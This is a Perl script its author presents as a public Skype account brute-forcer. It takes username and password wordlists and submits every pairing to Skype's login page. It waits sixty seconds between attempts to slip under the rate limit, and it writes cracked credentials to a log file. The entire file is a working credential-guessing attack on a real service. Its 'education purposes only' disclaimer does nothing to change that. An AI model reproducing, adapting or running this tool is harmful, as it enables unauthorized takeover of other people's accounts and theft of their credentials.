#!perl
#With this program you can bruteforce skype accounts                                      
#Author: Alexander Rachev (a.k.a matrix_killer)                 
#Contact: matrix_k _at_ abv.bg                       
#Version: 3.0      
#This is probably the first public skype bruteforcer                      
#Copyright: this program is under a Creative Commons Attribution 2.5 Bulgaria License.         
#Greets: Bl0od3r, Acid_BDS, Alpha-fan and all other friends[they know who they are ;)]         
#             !WARNING!                               
#THIS PROGRAM IS MADE FOR EDUCATION PURPOSES ONLY ! I'M NOT RESPONSIBLE FOR YOUR ACTIONS !!!  

#http://search.cpan.org/~dland/Crypt-SSLeay-0.57/SSLeay.pm IS REQUIRED !!!!
#The developers of skype are very fast in patching bugs and now there is a one minute anti-bruteforce protection.The only solution is sleep(60) and that is #what I have added
#Yes, I know it's SLOW
 
 use Getopt::Std;
 use HTTP::Request::Common qw(POST);
 use LWP::UserAgent;

  $| = 1; 

  getopts('u:p:');
  our($opt_u,$opt_p);

  my $userlist = $opt_u;
  my $passlist = $opt_p;

  if ($userlist eq "") {
  print "\n";
  print "***************************************************************************\n";
  print "Skype Bruteforcer v3.0                       \n";
  print "By Alexander Rachev(a.k.a matrix_killer)              \n";
  print "usage: perl $0 -u <users file> -p <passwords file>           \n";
        print "ex: perl $0 -u users.txt -p passwords.txt                    \n";
  print "***************************************************************************\n\n";
  exit (1);
  }

  open(USERS, "<$userlist") || die ("Cannot open username file");
  open(WORDS, "<$passlist") || die ("Cannot open password file");
  @users= <USERS>;
  @words= <WORDS>;
  close(USERS);
  close(WORDS);
  $i=0;
 
 foreach $user (@users) {
 chomp($user);
 foreach $pass (@words) {
 chomp($pass);
 sleep(60);
 $ua = LWP::UserAgent->new;
 printf("\nTrying $user:$pass", ++$i);
 my $req = POST 'https://secure.skype.com/account/login',
                [ invite_token => '', timezone_field => '', username => $user, password => $pass ];


  my $res = $ua->request($req);
  
  if ($res->as_string =~ /cookiecheck/gi) {
  open (LOG, ">>bruted_skype_accounts.txt");
  $time = time();
  $loctime = localtime($time);
  print LOG "\n";
  print LOG "Time: $loctime\n";
  print LOG "username: $user\n";
  print LOG "passowrd: $pass\n";
  close(LOG);
  }}}
  
  if (-e "bruted_skype_accounts.txt") { 
  print "\nA file named bruted_skype_accounts.txt was created in the directory\n\n";
  }else{
  print "\nSorry no matches\n\n"; 
  }